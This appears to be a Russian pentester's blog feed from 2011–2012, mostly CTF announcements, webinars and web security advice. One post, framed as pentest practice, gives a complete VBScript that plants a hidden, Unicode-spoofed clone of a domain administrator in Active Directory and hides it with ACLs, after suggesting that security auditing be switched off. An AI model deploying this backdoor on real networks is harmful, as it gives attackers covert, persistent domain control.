В тему ИБ

Доигрался или звезда в шоке)

noreply@blogger.com (Dmitry Evteev) — Fri, 27 Jan 2012 01:11:19 PST

NO COMMENTS ^_^

Вебинары Positive Technologies

noreply@blogger.com (Dmitry Evteev) — Thu, 26 Jan 2012 15:33:26 PST

Опубликовано расписание образовательной программы "Практическая безопасность" на первое полугодие 2012 года. Стоит отметить, что запланированный список тем не является окончательным и со временем будет пополняться. Разумеется, все самые "вкусные" темы припасены на международный форум Positive Hack Days :)

А пока счет 7/4 и MaxPatrol заметно лидирует))

Как MaxPatrol ищет 0day?

noreply@blogger.com (Dmitry Evteev) — Wed, 25 Jan 2012 07:47:09 PST

Легко! :) http://www.zerodayinitiative.com/advisories/ZDI-12-015/

Backdoor в Active Directory следующего поколения

noreply@blogger.com (Dmitry Evteev) — Tue, 10 Jan 2012 00:33:33 PST

В начале прошлого года мною уже поднималась тема пост-эксплуатации в домене Microsoft Active Directory. В предложенном ранее подходе рассматривался вариант ориентированный больше на случай утери административных привилегий, нежели их непосредственное использование. При этом само действо по возврату этих привилегий подразумевало "шумные" события и визуально палевные манипуляции в каталоге. Другими словами, для того, чтобы вернуть себе административные привилегии в домене, требовалось стать участником соответствующей группы безопасности, например, группы "Domain Admins".

Надо сказать, что администраторы очень волнуются, когда неожиданно осознают присутствие в своей системе кого-то еще. Некоторые из них бросаются всеми силами обрабатывать инцидент безопасности. Порой, самыми непредсказуемыми действиями ;))

Теперь представьте, как себя может повести администратор Active Directory в крупной компании, при виде незнакомого идентификатора в группе безопасности "Enterprise Admins"? В случае если кто-то залился не понарошку, тогда озабоченность администратора полностью оправдана. Но в случае недостаточного противодействия при проведении пентеста, шибко волноваться явно не стоит (ровно, как лишать парней точек входа и добытых потом и кровью привилегий).

Я долго размышлял над тем, как, не пугая администраторов, свободно пользоваться достигнутыми привилегиями в ходе проведения тестирования на проникновение (особенно на фоне агрессивного противодействия со стороны администраторов на последних работах). С одной стороны, при проведении пентеста мы сильно ограничены в возможностях. Например, правило по минимизации воздействия на объект исследования – это как само собой разумеющееся. Поэтому наплодить и раскидать бэкдоров по захваченной сети мы попросту не можем. С другой стороны, есть совершенно понятные цели, к которым требуется прийти до того момента, как радостный администратор заметит несанкционированную активность и выдернет шнур из розетки.

Так как же можно оставаться незамеченным в сетях Microsoft?

Первое, что приходит в голову - использовать учетную запись администратора. Доступ легитимный, поэтому он не должен привлекать к себе особое внимание. Но, как показывает практика, не всегда удается получить пароль администратора в открытом виде. В этих случаях на помощь спешит атака, известная под названием Pass-the-Hash. Было бы почти все замечательно (почти, потому как Pass-the-Hash сужает возможности по развитию атаки, например, нельзя воспользоваться протоколом удаленного управления RDP), но в серьезных компаниях администраторы потихоньку переходят на смарт-карты, что не позволяет использовать атаки, основанные на недостатках протокола NTLM. Хорошо, но есть же еще возможность использования токена авторизованного пользователя (eq incognito) и/или билета Kerberos (eq WCE). Так-то оно конечно так, но на практике Kerberos не керберос и токен не токен:( Доступный инструментарий по проведению данных видов атак, к сожалению, откровенно лажает. Кроме того, в обоих случаях, ровно как с атакой Pass-the-Hash, действия атакующего весьма ограничены используемыми протоколами, поддерживающими SSO в домене.

Таким образом, самый привлекательный путь - это использование привилегий, если уж не существующего, так созданного идентификатора администратора домена с известным паролем...

Как при этом не нарваться на бдительный глаз администратора домена?

Во-первых, внесение изменений в каталог Active Directory порождает соответствующие события, о которых администратору лучше не знать. Поэтому перед заливкой в домен (разумеется, только при проведении тестирования на проникновение и после согласования сего действа с ответственным лицом на стороне заказчика) рекомендуется отключить ведение событий безопасности на контролерах домена посредством соответствующего GPO. Напомню, что по умолчанию время фонового обновления групповых политик для контроллеров домена составляет 15 минут.

Во-вторых, никто не мешает создать визуально идентичную учетную запись, аналогичную существующему администратору домена. Для этого, например, могут использоваться символы юникода (!). Далее, созданному пользователю выставляется атрибут "showInAdvancedViewOnly" в значение "TRUE", что позволит скрыть объект в стандартном режиме просмотра оснастки "Управления пользователями и компьютерами" (dsa.msc). После чего, осталось поместить этого пользователя в одну из административных групп, свободную от реального администратора домена (прим., как правило, администраторы любят воткнуть свою учетную запись во все мыслимые и не мыслимые административные группы; например, оставим администратора в группе "Enterprise Admins", а клона поместим в группу "Domain Admins").

Но я думаю, что многие из читателей уже засомневалась в успехе компании. И они правы! Этот способ никуда не годится, т.к. в нем присутствуют два существенных недостатка:
1. Созданный идентификатор пользователя виден в каталоге "вооруженным глазом".
2. При поиске пользователей в домене, учетная запись администратора начинает двоиться.

Как можно решить эти проблемы?

Казалось бы, самое простое решение на поверхности – правильно настроить права доступа к создаваемому объекту (нашему пользователю). Для этого достаточно группе "Everyone" запретить читать публичную информацию у объекта. И в организационной единице, рядом с реальным администратором Active Directory повиснет "нечто", что как минимум перестанет светиться при поиске пользователей в домене. Однако сказка продлится не более, чем 60 минут:( Дело в том, что по умолчанию каждые 60 минут на контроллере домена, выполняющего роль эмулятора PDC, запускается процесс "SDPROP", который восстанавливает права доступа у ряда объектов Active Directory (в том числе, у всех членов групп администраторов) в соответствии с установленными правами доступа на объект "AdminSDHolder" (http://technet.microsoft.com/en-us/query/ee361593).

К сожалению, отключить указанный механизм безопасности штатными возможностями невозможно. Хак с правами доступа на объект может привести к проблемам с репликацией (а тут уже попахивает какой-то диверсией; при пентесте низя). Перезапись прав доступа на "AdminSDHolder" затронет множество объектов, включая идентификаторы всех администраторов домена. Таким образом, одним из возможных полезных решений, может быть регулярный запуск сценария, который будет исправлять погрешности процесса "SDPROP", но есть и более перспективная альтернатива.

Процесс "SDPROP" восстанавливает права доступа (ACE) только на конкретные привилегированные объекты, при этом права доступа для организационных единиц, в которых содержатся подобные объекты, остаются неизменными. Этим-то как раз и можно воспользоваться! Нам ведь никто не мешает, используя символы юникода, создать аналогичную последовательность организационных единиц, аналогично той последовательности, в которой содержится клонируемый идентификатор. При этом, "правильные" права доступа на вышестоящий контейнер позволят его визуально скрыть от посторонних глаз (разумеется в пределах разумного).

Смысл подобного подхода заключается в том, что у администратора Active Directory не должны появиться нездоровые подозрения на тему того, что доверенная ему система была скомпрометирована. Он по-прежнему остается действующим администратором, разве что членом одной из привилегированных групп является визуально идентичная учетная запись...

И последнее. Для того чтобы созданный клон не дублировался в поиске по каталогу можно воспользоваться, например, символом "202E" (респект Александру Зайцеву за напоминалку). Указанный символ переворачивает строку, расположенную за ним. Таким образом, если мы, к примеру, создаем клон для идентификатора "dmitry.ivanov", создаваемый идентификатор будет иметь вид "202E"+"vonavi.yrtimd". Возможно, такой подход не так удобен для прохождения аутентификации, но от попадания в поиск по каталогу спасает.

С точки зрения журналов безопасности, рассматриваемый подход также позволяет оставаться незамеченным до определенного момента.

Ниже представлен сценарий, который автоматизирует все выше сказанное. Настраиваемые параметры:

strAdminsamAccountName – идентификатор, который требуется с клонировать
strAdminsGroup – привилегированная группа, в которую следует поместить клона
strPassNewUser – задаваемый пароль новому пользователю

On Error Resume Next strAdminsamAccountName = "dmitry.ivanov" strAdminsGroup = "Domain Admins" strPassNewUser = "P@ssw0rd" ' - - - Dim arrContainer(), i Set objRootDSE = GetObject("LDAP://RootDSE") strDomain = objRootDSE.Get("DefaultNamingContext") Set objDomain = GetObject("LDAP://" & strDomain) strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'") If Not IsNull(strAdminsamAccountNameDN) Then Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN) Set objOU = GetObject(objAdmin.parent) i=0 Call EnumOUs(objOU) For j = i-1 To 0 Step -1 if strContainer="" Then strContainer = "OU=" & arrContainer(j) & strContainer primaryContainer = strContainer Else strContainer = "OU=" & arrContainer(j) & "," & strContainer End if Set objOUcreate = objDomain.Create("organizationalUnit", strContainer) objOUcreate.SetInfo Next Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain) Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName)) objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName) objUserCreate.SetInfo On Error Resume Next objUserCreate.SetPassword strPassNewUser objUserCreate.Put "userAccountControl", 66048 objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName) objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn) objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials) objUserCreate.SetInfo On Error Resume Next objUserCreate.Put "showInAdvancedViewOnly", "TRUE" objUserCreate.SetInfo On Error Resume Next NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'") If Not IsNull(strAdminsGroupDN) Then Set objGroup = GetObject("LDAP://" & strAdminsGroupDN) objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN) objGroup.SetInfo objGroup.PutEx 3, "member", Array(NewUserDN) objGroup.SetInfo End If OUAddAce(primaryContainer & "," & strDomain) End If Function SearchDN(str) Set objConnection = CreateObject("ADODB.Connection") objConnection.Provider = "ADsDSOObject" objConnection.Open "Active Directory Provider" Set objCommand = CreateObject("ADODB.Command") Set objCommand.ActiveConnection = objConnection objCommand.Properties("Searchscope") = 2 objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str Set objRecordSet = objCommand.Execute If Not objRecordSet.EOF Then SearchDN = objRecordSet.Fields("distinguishedName").Value End if End Function Sub EnumOUs(objChild) Dim objParent Set objParent = GetObject(objChild.Parent) If (objParent.Class = "organizationalUnit") Then ReDim Preserve arrContainer(i + 1) arrContainer(i) = objChild.ou i=i+1 Call EnumOUs(objParent) Else ReDim Preserve arrContainer(i + 1) arrContainer(i) = objChild.ou & ChrW(128) i=i+1 End If End Sub Function OUAddAce(OU) Dim objSdUtil, objSD, objDACL, objAce Set objOU = GetObject ("LDAP://" & OU) Set objSdUtil = GetObject(objOU.ADsPath) Set objSD = objSdUtil.Get("ntSecurityDescriptor") Set objDACL = objSD.DiscretionaryACL Set objAce = CreateObject("AccessControlEntry") objAce.Trustee = "Everyone" objAce.AceFlags = 2 objAce.AceType = 6 objAce.AccessMask = 16 objAce.Flags = 1 objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}" objDacl.AddAce objAce objSD.DiscretionaryAcl = objDacl objSDUtil.Put "ntSecurityDescriptor", Array(objSD) objSDUtil.SetInfo Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor") intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000 objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor objOU.SetInfo End Function

С новым годом!!!

noreply@blogger.com (Dmitry Evteev) — Tue, 03 Jan 2012 03:30:52 PST

Поздравляю всех с уже наступившим Новым годом 2012! Желаю творческих успехов, удачи в этом году и, разумеется, больше позитива!!! :)

Подведение итогов PHDays CTF AfterParty 2011

noreply@blogger.com (Dmitry Evteev) — Tue, 27 Dec 2011 09:42:08 PST

Завершился двухнедельный конкурс по практической защите информации в рамках PHDays CTF AfterParty 2011. Победителем соревнования стал участник под псевдонимом kyprizel, набравший максимальное число очков из числа возможных. Респект и уважуха!!!

В качестве приза он получит самую новую версию легендарного сканера безопасности XSpider 7.8 и приглашение на международный форум Positive Hack Days 2012 в качестве участника. Остальных победителей, а это участники, которые заняли 2-17 места на 25.12, ждут дипломы и подарки от организатора соревнований – компании Positive Technologies.

Спасибо всем, кто принимал участие в соревнованиях CTF Quals и CTF Afterparty! Я надеюсь участие в этих конкурсах принесло вам массу позитивных эмоций :) А для всех тех, кто не смог принять участие в этих конкурсах, но желал бы проверить свои хакерские способности, регистрация и участие в PHDays CTF AfterParty 2011 продлена до 20-го января 2012 года.

И, разумеется, если Вам есть, что сказать, будем благодарны за объективную критику и общие отзывы об этих конкурсах.

Positive Hack Days CTF 2012 (предварительный список команд)

noreply@blogger.com (Dmitry Evteev) — Tue, 20 Dec 2011 02:25:44 PST

Определился список команд, которые будут приглашены на соревнования по практической безопасности Positive Hack Days CTF 2012. По результатам отборочных испытаний CTF Quals 2011 приглашения получат следующие команды:

- eindbazen, Нидерланды
- leetmore, Россия
- int3pids, Испания
- HackerDom, Россия
- 0daysober, Франция

(почему команда rdot.org не примет участие в PHDays CTF 2012? Это большой большой секрет :))

Личные приглашения получат следующие команды:
- Plaid Parliament of Pwning, США
- BIOS, Индия
- Shell-storm, Франция/Швейцария
- C.o.P, Франция
- IV, Россия
- FluxFingers, Германия
- HNG48, Япония

Призовой фонд CTF 2012 до конца не определен, но предполагается его увеличение;)

P.S. Если найдутся желающие собрать 1-2 запасных команд (на случай форс мажора с основными командами), пишите на почту devteev@ptsecurity.ru.

Positive Hack Days Young School & CFP is open!

noreply@blogger.com (Dmitry Evteev) — Thu, 15 Dec 2011 06:59:07 PST

С сегодняшнего дня открывается регистрация докладов на конкурс работ молодых ученых по информационной безопасности и на выступление в основной секции международного форума по практической безопасности Positive Hack Days 2012.

Подробности приема заявок доступны по соответствующим ссылкам:

- Young School

- Call for Papers

PHDAYS CTF Quals 2011 competitions completed

noreply@blogger.com (Dmitry Evteev) — Sun, 11 Dec 2011 07:01:11 PST

Отборочные соревнования PHDAYS CTF Quals завершены. Лидеры соревнования:

Ознакомиться с полным рейтингом отборочных соревнований можно по следующей ссылке: http://phdays.ru/ctf_quals_rating.asp

По результатам CTF Quals пять наиболее сильных команд будут приглашены на очные соревнования PHDAYS CTF, которые пройдут в Москве 30-31 мая в 2012 году. Стоит добавить, что часть команд были приглашены организаторами форума Positive Hack Days вне зачета и таким образом предполагается, что в соревнованиях PHDAYS CTF 2012 будут соперничать 12-15 команд. Окончательный список команд будет опубликован до конца года (следите за новостями).

Спасибо всем за участие в отборочных соревнованиях PHDAYS CTF Quals! И уже завтра битва будет продолжена в рамках CTF Afterparty, y a w3lc0me!

PHDAYS CTF Quals 2011

noreply@blogger.com (Dmitry Evteev) — Sat, 10 Dec 2011 00:16:11 PST

Отборочные соревнования PHDAYS CTF Quals 2011 в самом разгаре! Командам участникам соревнования следует авторизоваться в личном кабинете для получения необходимых реквизитов доступа. С легендой используемой игровой инфраструктуры можно ознакомиться на сайте мероприятия: http://phdays.ru/monolith.asp

Следить за рейтингом отборочного соревнования можно по следующей ссылке: http://phdays.ru/ctf_quals_rating.asp

Напомню, что лидеры отборочных соревнований CTF Quals будут приглашены на очные соревнования PHDAYS CTF, которые пройдут в Москве 30-31 мая в 2012 году.

Сразу же после окончания отборочного соревнования стартует конкурс PHDAYS CTF Afterparty, участники которого могут повторить подвиги своих предшественников. Наиболее проявившие себя участники CTF Afterparty также будут приглашены на международный форум Positive Hack Days 2012.

Очередная атака нулевого дня через продукты Adobe

noreply@blogger.com (Dmitry Evteev) — Wed, 07 Dec 2011 06:30:04 PST

Сообщество вновь переживает сильные эмоции по поводу очередных проблем безопасности, которые (неожиданно) были обнаружены в продуктах всеми любимой компании Adobe. Проблема затрагивает программное обеспечение Adobe Reader на всех основных платформах Windows, Macintosh и UNIX т.е. атака вполне может быть кроссплатформенной. Подробности: http://www.adobe.com/support/security/advisories/apsa11-04.html

В тоже время, как-то тихо и незаметно в сплоит паке VulnDisco под IMMUNITY Canvas появился 0day в Adobe Flash: https://lists.immunityinc.com/pipermail/canvas/2011-November/000082.html, http://seclists.org/dailydave/2011/q4/80. Таким образом, использование уязвимостей в продуктах компании Adobe по-прежнему может составить конкуренцию использованию уязвимостей в Java.

ZeroNight: резюме

noreply@blogger.com (Dmitry Evteev) — Tue, 29 Nov 2011 01:47:25 PST

Многие к этому моменту уже высказали свое мнение по поводу конференции ZeroNight [1,2,3,4,5,6,7], которая проходила 25 ноября. Обобщая все высказывания могу отметить, что, по мнению большинства, мероприятие удалось, в большей степени, за счет высокого уровня технических докладов (а что еще нужно для хорошей хакерской тусы?). Из минусов все участники конференции отмечают недостатки, связанные с организационными моментами.

Собственное мнение я уже озвучил непосредственно организаторам мероприятия, потому не стану его транслировать сюда. В любом случае, мой отзыв заведомо будет расценен, как не объективный. Поэтому скажу лишь "э-ге-гей! Мы были на ZeroNight и отлично провели время!".

Основы безопасности веб-приложений

noreply@blogger.com (Dmitry Evteev) — Thu, 24 Nov 2011 05:37:30 PST

Презентация с сегодняшнего вебинара представлена ниже. Всем спасибо, кто потратил свое время на мое выступление!

Введение в тему безопасности веб-приложений

View more presentations from Dmitry Evteev

Безопасность веб-приложений: просто о сложном

noreply@blogger.com (Dmitry Evteev) — Tue, 22 Nov 2011 23:51:09 PST

Как бы далеко я не запланировал свои "пять копеек" в общей движухе серии бесплатных вебинаров, проводимых под логотипом Positive Technologies, день икс настал (неожиданно!;)). Поэтому приглашаю завтра на свой вебинар по избитой теме безопасности веб-приложений. Ничего принципиально нового в рамках этого вебинара я не расскажу (и это должно быть очевидно из названия вебинара), но возможно помогу аудитории упорядочить уже имеющиеся знания в этой предметной области.

Стоит отметить, что этот вебинар является первой ласточкой на пути к трехдневному курсу по безопасности веб-приложений, который мы будем разрабатывать и продвигать. Но это планы уже следующего года.

Формат мероприятия Positive Hack Days

noreply@blogger.com (Dmitry Evteev) — Fri, 18 Nov 2011 02:34:58 PST

PHD 2011-2012 from Positive Technologies on Vimeo.

Напоминалко: регистрация на Positive Hack Days 2012 уже открыта и доступна по следующей ссылке - http://phday.ru/registration.asp

CTF Quals / CTF Afterparty

noreply@blogger.com (Dmitry Evteev) — Tue, 15 Nov 2011 03:07:51 PST

В декабре стартует отборочный тур международных соревнований по защите информации PHD CTF. Основные состязания пройдут 30–31 мая 2012 года в Москве во время второго международного форума по информационной безопасности Positive Hack Days.

В этом году все желающие могут попробовать свои силы в отборочном туре: CTF Quals или CTF Afterparty. Все участники попробуют свои силы в оценке защищенности, поиске и эксплуатации уязвимостей, выполнении заданий на реверсинг и просто хакерстве. Причем борьба будет проходить в условиях, максимально приближенных к боевым: уязвимости, использованные в PHD CTF Quals и CTF Afterparty, не выдуманы, а встречаются в "живой природе".

10 и 11 декабря в отборочном туре PHD CTF Quals определятся лучшие команды, которые примут участие в финале PHD CTF в мае.

С 12 по 25 декабря состязания продолжатся в индивидуальном зачете: самые яркие участники PHD CTF Afterparty 2011 получат дипломы от Positive Technologies и смогут продолжить борьбу на форуме PHD в мае 2012 года.

Подробности и регистрация: http://phdays.ru/registration.asp

Разыскиваются пентестеры

noreply@blogger.com (Dmitry Evteev) — Thu, 10 Nov 2011 22:32:29 PST

В связи с ростом числа работ по тестированию на проникновение и расширением одноименного отдела нам требуются новые силы!

Что такое работать пентестером в компании Positive Technologies?

Это работа в высококвалифицированной команде профессионалов. Анализ защищенности сетевых инфраструктур ведущих российских и зарубежных компаний. Новые, комплексные, нестандартные и интересные задачи каждый день. Проведение тестов на проникновение, аудитов информационной безопасности, участие в исследовательской деятельности отдела, посещение и участие в российских и международных конференциях. Участие в организации передовой практической конференции по информационной безопасности Positive Hack Days. Широкие возможности для развития собственных наработок и исследований в области информационной безопасности. Участие в некоммерческих хакерских проектах.

Кого мы ждем?

Кандидат должен иметь навыки практической компрометации или защиты систем, как минимум в одной из следующих областей:
- сетевая инфраструктура и беспроводные сети (проектирование сетей, сетевое оборудование, протоколы маршрутизации, межсетевое экранирование, IDS/IPS)
- информационная инфраструктура на бае Windows, Unix и Linux (ОС, служба каталога Active Directory, понимание принципов обработки и хранения чувствительной информации в ОС)
- прикладные системы (СУБД, веб-приложения)

Требуемый скилл:
- Опыт работы в сфере информационной безопасности от 0 до 5 лет
- Широкий кругозор в профессиональной отрасли
- Способность решать нетривиальные задачи
- Навыки программирования
- Желание учиться, изучать и самосовершенствоваться

Работать в компании Positive Technologies – это круто! Ждем тебя!

MS11-083:Vulnerability in TCP/IP Could Allow Remote Code Execution

noreply@blogger.com (Dmitry Evteev) — Tue, 08 Nov 2011 11:14:17 PST

Ожидается сплоетс на уязвимость в реализации TCP/IP стека операционных систем Windows серии Vista и выше. "Правильный" пакет отправленный на закрытый порт по протоколу UDP, может привести к выполнению произвольного кода. С такой приятной новости начинается вторник нулевого дня))

Подробности:

- http://www.securitylab.ru/vulnerability/409824.php

- http://technet.microsoft.com/en-us/security/bulletin/ms11-083

Чего ждать от Positive Hack Days CTF 2012?

noreply@blogger.com (Dmitry Evteev) — Tue, 08 Nov 2011 02:31:58 PST

Такого нет даже в самых ваших смелых мыслях... ))

Подготовка к PHD CTF 2012

К слову, скоро стоит ожидать анонс мероприятия и дату его проведения.

Client-Side Vulnerabilities

noreply@blogger.com (Dmitry Evteev) — Tue, 18 Oct 2011 09:18:45 PDT

Глянул на досуге страничку статистики серфпатруля и... совершенно не удивился, когда увидел, что 86% посетителей этого блога бесстрашно серфят просторы интернета:

Статистика по сайту devteev.blogspot.com (18.07.2011-18.10.2011)

Годы проходят, цифры не меняются [1]. Интерес к уязвимостям в Adobe постепенно заменяет интерес к уязвимостям в JAVA [2]. Рекомендую проявить озабоченность, тем, кто тут красный :)

Все что вы хотели знать про безопасность VOIP, но боялись спросить

noreply@blogger.com (Dmitry Evteev) — Mon, 10 Oct 2011 02:29:27 PDT

Продолжая серию вебинаров в рамках образовательной программы "Практическая безопасность" Константин Гурзов и Глеб Грицай раскроют тему безопасности технологии VOIP. Два ближайших вебинара полностью посвящены именно этой теме.

13 октября 14:00 - Легенды и мифы безопасности VOIP Зарегистрироваться
10 ноября 14:00 - Безопасность VOIP Добавить в календарь

Инфобез 2011

noreply@blogger.com (Dmitry Evteev) — Fri, 07 Oct 2011 02:51:56 PDT

Довелось на этой неделе побывать в качестве спикера на Инфобез 2011. Скажу честно, что предвкушая это мероприятие в мыслях крутился текст, что мол к подобным выставкам я отношусь крайне положительно. И в качестве аргументов вспоминал чувства и эмоции, которые испытывал на Infosecurity до его деления на два лагеря в далеком 2009 году. К сожалению, половинка Infosecurity под логотипом Инфобез не оправдала моих ожиданий и я был несколько разочарован.

Несмотря на то, что в целом Инфобез оказался каким-то небольшим междусобойчиком, в центре всего действа располагался стенд... нет, вовсе не стенд компании Positive Technologies, а стенд, посвященный мероприятию PHDAYS :) Что собственно многих посетителей несколько смутило.

Чтобы как-то разнообразить свое прибывание на Инфобезе, мы с парнями решили устроить себе live hack ;) История началась с того, что в первый день мероприятия Евгений Климов заметил своего двойника, который располагая пропуском в VIP-клуб (-бар) от имени Евгения не теряясь кутил там весь день, а к вечеру не отказал себе и в удовольствии отведать эля, которым угощали организаторы всех участников выставки безвозмездно. Мы решили повторить его подвиги в части клонирования Евгения Климова)

Ближе к завершению Инфобеза и после всех выступлений мы направились за заслуженными бонусами в сторону VIP...

Профит11 :)

Ниже презентации с моих выступлений.

Секция Алексея Лукацкого, Все хотят работать удаленно. Кто будет думать о безопасности?

Мобильный офис глазами пентестера

View more presentations from Dmitry Evteev

Секция Владимира Лепихина, Проблемы противодействия атакам на отказ в обслуживании (DDoS-атакам)

Практика проведения DDoS-тестирований

View more presentations from Dmitry Evteev

(снова) Взломан сайт MySQL.com

noreply@blogger.com (Dmitry Evteev) — Wed, 28 Sep 2011 04:28:03 PDT

Какая-то нездоровая тенденция наблюдается в последнее время. То и дело ломают крупные проекты, безопасность которых по идее должна быть примером для подражания. Kernel.org, Linux.com, SourceForge.net, PHP.net в далеком 2009 Apache.org. Хорошо, если по результатам инцидента делаются правильные выводы и адекватные действия, так ведь нет! Не все учатся с первого раза.

Меньше полугода был взломан сайт MySQL.com и вот снова, проект подвергся той же напасти.

Может быть уже пришло время учиться на ошибках других и ~~уже что-то делать~~ обеспечивать адекватную безопасность информационным активам?

CoreSecurity.com defaced

noreply@blogger.com (Dmitry Evteev) — Fri, 23 Sep 2011 03:21:28 PDT

Вчера оф. сайт известной компании в области информационной безопасности, разработчика профессионального инструмента для проведения тестирований на проникновение CORE IMPACT, подвергся дефейсу. Примечательно, что на странице дефейса злоумышленник оставил ссылку на свой аккаунт в твиттере. Судя по дефейсу, взлом был осуществлен из побуждений мести...

P.S. Ярко выраженный представитель хакерского сообщества.

Хроники пентестера #4: безопасность внешних веб-приложений

noreply@blogger.com (Dmitry Evteev) — Thu, 22 Sep 2011 05:33:46 PDT

Как и несколько лет назад, веб-приложения по-прежнему остаются наиболее привлекательной мишенью для нарушителей всех мастей. Тут всегда хватит места и для матерых SEOшников, и для желающих нести свои мысли в массы путем подмены содержимого страниц, и, разумеется, веб-приложения являются первоочередной мишенью при преодолении внешнего периметра компаний, как в тестированиях на проникновение, так и в суровой жизни.

Повсеместно низкая безопасность веб-приложений обусловлена множеством факторов: от качества разрабатываемого кода и выбранного языка программирования, до используемых конфигураций на стороне веб-сервера. Масло в огонь добавляет еще тот факт, что безопасность веб-приложений держится особняком относительно общей стратегии безопасности. Менеджеры структурных подразделений инициируют процессы развития бизнеса, которые в свою очередь, так или иначе, базируются на веб-технологиях. При этом служба управления информационной безопасностью в среднестатистической компании как бы закрывает глаза на то, что приобретаемое решение может содержать уязвимости. Более того, из опыта проводимых работ, больше половины ИБ подразделений в российских компаниях даже не подозревают, кто ответственен за внешний, официальный сайт компании, не говоря уже о том, кто занимается его безопасностью. Потому веб-приложения и взламывают на потоке.

Проводимые в последнее время пентесты наглядно подтверждают эти доводы. Когда группа пентестеров используя уязвимости веб-приложений доходили до выполнения команд операционной системы, (помимо радости собственного превосходства)) создавалось обоснованное ощущение, что мы тут не одни.

В одном из пентестов на сайте заказчика было найдено несколько критических уязвимостей, которые в перспективе могли позволить выполнять команды на сервере. Однако воспользоваться ими продолжительное время не получалось. Секунды превращались в минуты, минуты складывались в часы, цель была так близка, но все старания были безуспешны. Оглядевшись вокруг было замечено, что перед нами лишь один из сайтов большого хостинга. Учитывая, что на страницах исследуемого сайта и его соседей был замечен один и тот же зловред, вполне логично предположить, что злоумышленник до нас вряд ли стал бы заморачиваться с уязвимостями именно нашего анализируемого сайта. Наверняка он шел по пути наименьшего сопротивления и залился через соседей. Но ограничения при пентесте не позволяют повторить подобные подвиги. Между тем, старания все-таки не были напрасны и используя каскад уязвимостей сайт заказчика сдал свою оборону. Далее, вместо классического сбора информации, предстояло выяснить, каким образом зловред попал на страницы этого ресурса.

Следующая история раскрывает тему использования уязвимостей нулевого дня при пентестах. Перед нами очередной оф. сайт другого заказчика на вполне себе безопасной системе управления сайтом Joomla. При поверхностном серфинге на глаза попадает уязвимый модуль, информация об уязвимости в котором еще не успела просочиться в паблик. Также известна информация, что на днях через указанный модуль проходила массовая заливка. И как это не странно, сплоитс у нас уже был на руках:)) Далее, как в голливудских фильмах. Вводим target, запускаем, заливаемся, радуемся)) После этого предстояло ответить на вопрос, "кто здесь"? И ответ не заставил себя долго ждать. Как бы шеллы с eval и base64 очень палевны.

Последняя история, о которой я хочу сегодня рассказать, не менее показательна, чем остальные. Шутка ли, когда на одном из внешних сайтов всеми известного и любимого российского банка установлен бэкдор на языке наших поднебесных друзей. Более того, даты показали, что бэкдор был залит более года назад и на протяжении всего этого времени оставался незамеченным! Остроты всей истории придает также тот факт, что операционная система, на котором расположен веб-сервер, входит в состав корпоративного домена Active Directory банка. Как было выяснено позже службой управления ИБ самого банка, за все время был зафиксирован лишь один запрос, который собственно и установил бэкдор, т.е. в этот раз просто повезло. Кстати, бэкдор (аля веб-шелл) под Tomcat действительно оказался довольно наворочен (добавили себе в копилку), а установлен он был к слову через дефолты в интерфейсе администрирования Tomcat.

Так как же защитится от подобных угроз?

Во-первых, если вы планируете развернуть свой сайт на внешнем хостинге, поинтересуйтесь у хостера, какие действия он предпринимает для защиты сайтов своих клиентов. На эту тему вспоминается еще одна история. Анализировали мы как-то сайт, расположенный в одном из регионов нашей необъятной родины. Зафиксировали SQL-иньекцию и принялись ее раскручивать, и, буквально через полчаса, видим послание от хостера в свой адрес:) Но самое примечательное в этой истории это то, что хостер оперативно обеспечил виртуальный патчинг найденной нами уязвимости. С другой стороны, выбирая хостера, возможно не следует слишком много от него ожидать, но фундаментальные механизмы безопасности он должен обеспечивать при оказании своих услуг.

Во-вторых - используйте стойкие, уникальные пароли везде, особенно на внешних веб-приложениях. Доступ к интерфейсам администрирования сайтом предоставляйте только доверенному списку IP-адресов. К слову, эти два простых правила вместе с минимальными привилегиями у пользователя, который взаимодействует с базой данных, помогает существенно снизить ущерб при наличии уязвимости типа внедрение операторов SQL.

И наконец, защищаясь от атак нулевого дня помните, что чем больше защитных механизмов вы обеспечите, тем выше вероятность того, что вы убережете свой сайт от подобной напасти. Вероятно от целенаправленной атаки с глупыми уязвимостями в коде приложения защититься не получится, но от массовых атак защититься вполне реально. А это уже не мало!

Так, что же требуется, чтобы защитить сайт от атаки нулевого дня при этом не прибегая к анализу его безопасности методом фаззинга или исходного кода? По моему видению должно быть реализовано как минимум следующее:
- стойкие пароли к используемым идентификаторам во всех интерфейсах (ftp, раздел администрирования и т.п.).
- все интерфейсы администрирования должны быть доступны только для доверенных IP-адресов; опционально, использование двухфакторной аутентификации везде, где это возможно.
- минимизация привилегий во всех компонентах.
- правильно настроенные таблицы разграничения доступа (начиная с файловой системы и заканчивая разграничением доступа средствами системы управления сайтом, если она предоставляет подобный функционал).
- безопасные конфигурации веб-сервера и его среды (например, безопасные конфигурации PHP).
- использование превентивных механизмов контроля (Web Application Firewall).
- ограничение сетевого доступа со стороны веб-приложения к любым другим компонентам сети; размещение веб-сервера в изолированной сетевой среде (aka персональная ДМЗ).

Придерживаясь перечисленных подходов вы существенно повысите безопасность своего веб-приложения. Желаю успехов в постоянной битве добра с добром по другую сторону :)